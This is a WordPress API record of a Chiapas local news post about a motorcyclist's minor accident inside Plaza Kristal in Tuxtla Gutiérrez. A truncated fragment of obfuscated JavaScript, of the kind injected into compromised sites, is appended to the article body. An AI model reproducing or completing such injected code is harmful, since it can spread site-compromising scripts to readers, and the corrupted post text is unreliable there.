{"id":13568,"date":"2024-01-12T03:07:35","date_gmt":"2024-01-12T03:07:35","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13568"},"modified":"2024-01-12T03:07:36","modified_gmt":"2024-01-12T03:07:36","slug":"joven-motociclista-se-accidenta-en-plaza-kristal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13568","title":{"rendered":"Joven motociclista se accidenta en Plaza Kristal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1705028797306-1024x768.jpg\" alt=\"\" class=\"wp-image-13569\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1705028797306-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1705028797306-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1705028797306-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1705028797306.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 11 de enero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la tarde, un motociclista se accident\u00f3 al interior de la Plaza Kristal ubicada en el Bulevar Belisario Dom\u00ednguez y Ciro Farrera de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de una Italika perdi\u00f3 el equilibrio y al llegar a una rampa termin\u00f3 cayendo. Fueron los mismos clientes y visitantes los que ayudaron al hombre que result\u00f3 con diferentes heridas y escoriaciones. Al lugar arribaron param\u00e9dicos del Centro de Comando de Atenci\u00f3n M\u00e9dica Prehospitalaria, en coordinaci\u00f3n con personal de Emergencias y Traslados de Chiapas para brindar los servicios prehospitalarios pero no fue llevado a un nosocomio. Afortunadamente no result\u00f3 con lesiones de consideraci\u00f3n y sus familiares llegaron para llevarlo a su hogar.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 11 de enero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la tarde, un motociclista se accident\u00f3 al interior de la Plaza Kristal ubicada en el Bulevar Belisario Dom\u00ednguez y Ciro Farrera de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor de una Italika perdi\u00f3 el equilibrio y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13569,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-13568","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13568","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13568"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13568\/revisions"}],"predecessor-version":[{"id":13570,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13568\/revisions\/13570"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13569"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13568"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13568"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13568"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}